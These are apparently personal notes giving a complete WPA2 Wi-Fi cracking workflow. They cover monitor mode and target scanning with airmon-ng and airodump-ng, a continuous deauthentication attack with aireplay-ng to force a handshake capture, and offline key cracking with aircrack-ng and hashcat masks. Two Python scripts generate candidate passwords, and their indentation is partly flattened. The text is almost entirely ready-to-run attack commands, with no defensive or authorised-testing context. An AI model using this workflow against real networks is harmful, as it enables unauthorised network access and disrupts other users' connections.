WPA2 crack notes
Find WLAN adapter
iwconfigMonitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan1Scan
sudo airodump-ng wlan1monIf target is 5GHz: add --band a (airodump defaults to 2.4GHz/bg on many drivers)
sudo airodump-ng --band a wlan1monLock to target BSSID/channel
sudo airodump-ng -c <channel> -w outputfilename -d <BSSID> wlan1mon5GHz channel numbers differ (36, 40, 44, 48, 149, 153... not 1β13). Use --band a here too if locking to a 5GHz channel.
Deauth to force handshake
sudo aireplay-ng --deauth 0 -a <BSSID> -c <station MAC> wlan1monWait for WPA handshake: <BSSID> in the airodump header, then Ctrl+C.
Crack directly (wordlist only)
sudo aircrack-ng outputfilename-01.cap -w password.txtConvert for hashcat
hcxpcapngtool -o outputfilename.hc22000 outputfilename-01.capNumeric-only pass
hashcat -m 22000 -a 3 -O outputfilename.hc22000 '?d?d?d?d?d?d?d?d'Full charset mask β only viable up to ~8 chars
hashcat -m 22000 -a 3 -1 '?l?u?d' outputfilename.hc22000 '?1?1?1?1?1?1?1?1'Known length/suffix, unknown case placement
python3 -c "
import itertools
with open('test.hcmask', 'w') as f:
for i, j in itertools.combinations(range(10), 2):
letters = ['?u' if p in (i, j) else '?l' for p in range(10)]
f.write(''.join(letters) + '1234!!\n')
"
hashcat -m 22000 -a 3 -O outputfilename.hc22000 test.hcmaskTwo-word + known suffix (best odds for human-chosen passwords)
python3 << 'EOF'
from collections import defaultdict
words = set(w.strip().lower() for w in open("wordlist.txt") if w.strip().isalpha())
by_len = defaultdict(list)
for w in words:
by_len[len(w)].append(w)
TOTAL, SUFFIX = 10, "1234!!"
with open("candidates.txt", "w") as f:
for la in range(2, TOTAL-1):
lb = TOTAL - la
for a in by_len.get(la, []):
for b in by_len.get(lb, []):
f.write(a.capitalize() + b.capitalize() + SUFFIX + "\n")
EOF
hashcat -m 22000 -a 0 -O outputfilename.hc22000 candidates.txt

